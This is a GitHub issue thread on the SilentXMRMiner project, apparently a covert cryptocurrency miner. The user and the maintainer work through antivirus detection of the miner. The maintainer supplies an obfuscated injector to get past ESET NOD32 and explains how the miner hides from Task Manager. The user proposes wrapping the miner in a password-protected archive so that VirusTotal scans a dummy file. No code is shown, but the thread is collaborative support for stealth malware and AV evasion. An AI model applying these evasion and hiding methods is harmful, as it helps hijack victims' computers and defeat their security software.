### ISSUE TITLE
eset nod32 detected miner

### ISSUE THREAD

**Issue by Toxenskiy** [UnamSanctam/SilentXMRMiner#162]
the watchdog is working, but esetnod32 does not allow the mayer to start
![image](https://user-images.githubusercontent.com/55586522/114276218-5b8be500-9a2e-11eb-95e4-4877ab6a81d7.png)

**Comment by UnamSanctam** [comment]
Well yeah there are always going to be some detections, either by it not being obfuscated, the obfuscator being detected or it detecting behavior that's unavoidable. That being said, I've never heard about anyone using  ESET NOD32 in my life.

**Comment by Toxenskiy** [comment]
Detectitis injector

**Comment by Toxenskiy** [comment]
I think you can remove the detection from the injection

**Comment by UnamSanctam** [comment]
Well, either it detects the code of the injector or the behavior of injecting, nothing is ever going to be FUD since all antiviruses detect everything differently though. Try replacing the injector with this obfuscated one in the resources and see if it makes any difference.
[Mandark.zip](https://github.com/UnamSanctam/SilentXMRMiner/files/6290226/Mandark.zip)

**Comment by Toxenskiy** [comment]
ok

**Comment by Toxenskiy** [comment]
by the way, the watchdog file is generated next to the builder and not in the folder you specified

**Comment by UnamSanctam** [comment]
Oh right, it will probably do that since I added Path.GetFileNameWithoutExtension

**Comment by Toxenskiy** [comment]
helped

**Comment by UnamSanctam** [comment]
Ok, seems like the injector got detected since someone uploaded the Mandark.dll to VirusTotal.

**Comment by UnamSanctam** [comment]
But was only detected by a few AVs that most don't use.

**Comment by Toxenskiy** [comment]
1 more bug is related to the fact that the miner is not hiding from the task manager. But from the process hacker breaks down

**Comment by Toxenskiy** [comment]
by the way, there is an idea, we create an archive, put the miner there with a password of 1234 and then archive me an extension to dll and write a simple program that will unpack it

**Comment by Toxenskiy** [comment]
Thus, a dummy will fly to the tutal virus, and not a miner

**Comment by UnamSanctam** [comment]
The miner and all other files are already encrypted and only unpacked at runtime.

**Comment by UnamSanctam** [comment]
And the miner does hide from the Task Manager, I just tried it.

**Comment by Toxenskiy** [comment]
they are called the same on windows 7 and 10, it's just that they don't hide on windows 7

**Comment by UnamSanctam** [comment]
Since the Task Managers name is different in any language I use the WindowClass to detect if it's open. The WindowClass might be different in Windows 7.
